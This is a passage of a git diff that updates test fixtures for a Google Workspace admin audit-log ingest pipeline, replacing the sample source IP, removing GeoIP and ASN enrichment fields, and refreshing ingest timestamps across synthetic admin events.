- "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "url": { "path": "/path/in/url" @@ -43,7 +25,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -63,8 +45,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:26.128853900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"ADD_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:56.332587700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"ADD_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "ADD_WEB_ADDRESS", "id": "1", @@ -83,31 +65,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "url": { "path": "/path/in/url" @@ -124,7 +88,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -144,8 +108,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:26.128862200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"DELETE_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:56.332595800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"DELETE_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "DELETE_WEB_ADDRESS", "id": "1", @@ -172,7 +136,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -196,35 +160,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.128864400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:56.332601300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_SITES_SETTING", "id": "1", @@ -255,7 +201,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -279,35 +225,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.128866200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES\",\"parameters\":[{\"name\":\"SERVICE_NAME\",\"value\":\"service\"},{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"}]}}", + "ingested": "2021-12-09T13:38:56.332606600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES\",\"parameters\":[{\"name\":\"SERVICE_NAME\",\"value\":\"service\"},{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"}]}}", "provider": "admin", "action": "CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES", "id": "1", @@ -338,7 +266,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -362,35 +290,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.128868Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"VIEW_SITE_DETAILS\",\"parameters\":[{\"name\":\"SITE_NAME\",\"value\":\"site\"}]}}", + "ingested": "2021-12-09T13:38:56.332611900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"VIEW_SITE_DETAILS\",\"parameters\":[{\"name\":\"SITE_NAME\",\"value\":\"site\"}]}}", "provider": "admin", "action": "VIEW_SITE_DETAILS", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log index bed874fc9a4..7caea410de5 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log @@ -1,74 +1,74 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_2SV_SCRATCH_CODES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"GENERATE_2SV_SCRATCH_CODES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_3LO_DEVICE_TOKENS","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_3LO_TOKEN","parameters":[{"name":"APP_ID","value":"id"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ADD_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ADD_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"GRANT_ADMIN_PRIVILEGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_ADMIN_PRIVILEGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_ASP","parameters":[{"name":"ASP_ID","value":"id"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"TOGGLE_AUTOMATIC_CONTACT_SHARING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"BULK_UPLOAD","parameters":[{"name":"BULK_UPLOAD_FAIL_USERS_NUMBER","value":"1"},{"name":"BULK_UPLOAD_TOTAL_USERS_NUMBER","value":"10"},{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"BULK_UPLOAD_NOTIFICATION_SENT","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CANCEL_USER_INVITE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_CUSTOM_FIELD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_CUSTOM_FIELD","value":"custom"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_EXTERNAL_ID","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_GENDER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_IM","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ENABLE_USER_IP_WHITELIST","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_KEYWORD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_LANGUAGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_LOCATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_ORGANIZATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_PHONE_NUMBER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_RELATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_ADDRESS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CREATE_EMAIL_MONITOR","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"BEGIN_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"EMAIL_MONITOR_DEST_EMAIL","value":"dest@example.com"},{"name":"EMAIL_MONITOR_LEVEL_CHAT","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL","value":"info"},{"name":"END_DATE_TIME","value":"2002-10-02T16:00:00Z"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CREATE_DATA_TRANSFER_REQUEST","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DESTINATION_USER_EMAIL","value":"dest@example.com"},{"name":"APPLICATION_NAME","value":"a,b,c"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"GRANT_DELEGATED_ADMIN_PRIVILEGES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_ACCOUNT_INFO_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"REQUEST_ID","value":"id"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_EMAIL_MONITOR","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"EMAIL_MONITOR_DEST_EMAIL","value":"dest@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_MAILBOX_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"REQUEST_ID","value":"id"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_FIRST_NAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"GMAIL_RESET_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"GMAIL_RESET_REASON","value":"reason"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_LAST_NAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"MAIL_ROUTING_DESTINATION_ADDED","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"MAIL_ROUTING_DESTINATION_REMOVED","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"OLD_VALUE","value":"old"}]}} 